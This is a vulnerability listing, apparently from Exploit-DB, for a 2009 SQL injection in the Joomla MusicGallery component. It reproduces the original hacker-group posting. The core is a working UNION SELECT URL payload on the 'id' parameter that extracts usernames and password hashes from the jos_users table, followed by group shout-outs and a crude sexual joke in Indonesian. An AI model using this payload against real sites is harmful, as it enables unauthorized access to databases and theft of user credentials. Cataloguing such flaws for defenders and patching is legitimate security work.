Joomla Component MusicGallery SQL injection vulnerability

vendor:

MusicGallery

by:

Don Tukulesto

7.5

CVSS

HIGH

SQL injection

CWE

Product Name: MusicGallery

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Joomla Component MusicGallery SQL injection vulnerability

A SQL injection vulnerability exists in Joomla Component MusicGallery, which allows an attacker to execute arbitrary SQL commands via the 'id' parameter in a 'index.php?option=com_musicgallery&task=itempage' request.

Mitigation:

Input validation should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

/**************************************************************************

[!] Joomla Component MusicGallery SQL injection vulnerability
[!] Author	: Don Tukulesto (root@indonesiancoder.com)
[!] Homepage	: http://www.indonesiancoder.com
[!] Date	: November 15, 2009
[!] Tune In	: http://antisecradio.fm (choose your weapon)

**************************************************************************/

[ Software Information ]

[+] Download : http://joomlacode.org/gf/project/musicgallery/
[+] Developer Info : Itamar Elharar
[+] Description : multimedia mp3 gallery by category.
[+] Development Status: 4 - Beta
[+] License: GNU General Public License (GPL)
[+] Vulnerability : SQL injection


===========================================================================

[ Here we go.. Proof of Concept ]

http://server/index.php?option=com_musicgallery&task=itempage&id=[INDONESIANCODER]

[ Exploit ]

index.php?option=com_musicgallery&task=itempage&id=-23+union+select+1,1,concat%28username,0x3a,password%29,1,database%28%29,666,1,version%28%29,0x446f6e2054756b756c6573746f,1,2009,0x496e646f6e657369616e20436f646572,1,1,1+from+jos_users--&Itemid=54


===========================================================================

[ Who The Hell Has Control of That Damn Smoke Machine ]

[~] INDONESIAN CODER TEAM - KILL-9 CREW - MainHack Brotherhood - ServerIsDown
[~] kaMtiEz, M3NW5, arianom, Contrex, tiw0L, Pathloader, abah_benu, Saint, Cyb3r_tr0n, M364TR0N, VycOd,
[~] Jack-, Yadoy666 + miya666, s4va, senot, Bayu5154, Gonzhack, Tucker, Ian Petrucii, Ronz & FeeLCoMz
[~] kecemplungkalen, DraCoola Multimedia, XNITRO, rey_cute, Awan Bejat, Plaque, Gh4mb4s and YOU!!

[ Not ALLOWED ! ] 

[+] FOR MALINGSIAL


[ QUOTE ]

[+] kaMtiEz : nyelip dari mana ini yah !!! lol~
[+] ok, Don't forget to say : Saya terima nikmatnya anak bapak dengan seperangkat alat kelamin di bayar tunai.
[+] also Dengan kekuatan datang bulan... akan menghukum mu !!! XD